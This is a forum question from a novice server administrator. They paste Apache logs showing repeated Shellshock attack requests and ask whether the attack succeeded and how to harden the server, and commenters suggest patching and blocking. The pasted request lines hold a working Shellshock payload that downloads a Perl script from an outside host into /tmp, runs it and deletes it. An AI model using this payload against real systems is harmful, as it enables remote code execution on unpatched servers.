4
1
This is a bit confusing, by the way I’m not a system administrator and only know a little bit about handling a Linux.
I’m running a LAMP-based website and hosting it on Digital Ocean. The server is CentOS 7 and I installed a few security tools like like Fail2ban. I frequently check the error logs and request logs, just today I saw a few disturbing requests; examples below.
My question is, does the hacker is trying to plant the virus file name "a2.png" to my /tmp
folder? and does the hacker success planting it?
How should I know if the virus is now running in my server?
So far I can’t see that the file name exist in my tmp folder. What security measurement or server hardening should I install? And proper configuration of the apache? I only used the standard config of apache when I install the LAMP.
The website I’m handling is on virtual host and I’m using a framework to make it more secure. I’m not just sure If I’m on the right track securing my web server, I only installed Fail2ban for the logged-in attempt.
Error Log Examples
[Tue Aug 25 09:48:39.688528 2015] [core:error] [pid 24312] [client 64.15.155.177:33663] AH00126: Invalid URI in request GET HTTP/1.1 HTTP/1.1
[Tue Aug 25 09:48:40.877570 2015] [cgi:error] [pid 24306] [client 64.15.155.177:35398] script not found or unable to stat: /var/www/cgi-bin/report.cgi
[Tue Aug 25 09:48:41.042423 2015] [cgi:error] [pid 24331] [client 64.15.155.177:35687] script not found or unable to stat: /var/www/cgi-bin/webmap.cgi
Request Log Examples
64.15.155.177 - - [25/Aug/2015:09:48:39 -0400] "GET HTTP/1.1 HTTP/1.1" 400 226 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:39 -0400] "GET / HTTP/1.1" 301 234 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:40 -0400] "GET /main.cgi HTTP/1.1" 301 242 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:40 -0400] "GET /info.cgi HTTP/1.1" 301 242 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:40 -0400] "GET /index.cgi HTTP/1.1" 301 243 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:40 -0400] "GET /admin.cgi HTTP/1.1" 301 243 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
121.54.44.93 - - [25/Aug/2015:09:48:39 -0400] "GET / HTTP/1.1" 200 3785 "-" "Mozilla/5.0 (Linux; Android 4.4.2; en-ph; SAMSUNG SM-G7102 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36"
64.15.155.177 - - [25/Aug/2015:09:48:42 -0400] "GET /cgi-bin/register.cgi HTTP/1.1" 404 218 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
64.15.155.177 - - [25/Aug/2015:09:48:42 -0400] "GET /cgi-bin/download.cgi HTTP/1.1" 404 218 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http://coralindia.com/icons/a2.png -O /tmp/a2.png;curl -O /tmp/a2.png http://coralindia.com/icons/a2.png;perl /tmp/a2.png;rm -rf /tmp/a2.png*\");'"
4The real question is: If you have no experience, why not use a regular shared hosting plan? – Daniel B – 2015-08-27T05:47:44.320
I had the EXACT same thing happen to my server at the same time. From my brief googling it looks somewhat similar to a shellshock attack. Make sure your system is patched. If anyone has any further info, it would be appreciated. – None – 2015-08-27T05:33:00.180
The same IP was found attempting to hack into our systems but in a somewhat different way. We've blacklisted them and contacted their host. Over the last 5 days or so it looks like there has been some other reports on that IP. – None – 2015-08-30T03:19:48.177
Additionally, targeting one IP address implies that the problem of bots probing websites goes away if you simply block one address. When the reality is that IP might be blocked until the botnet decide to probe using another node/IP address. The days of simply blocking an IP address and calling it a day ended like 15+ years ago. Hardening, heuristic-based blocking and a good data recovery plan are the way to go. – JakeGould – 2015-08-30T04:49:04.310
iWeb hosting service out of Quebec, Canada. Whole netblock of addresses assigned to a datacenter to block if they decide to change it. It's like blocking an attack generated out of an Amazon Web Services EC2 VPS. – Fiasco Labs – 2015-08-30T05:10:36.343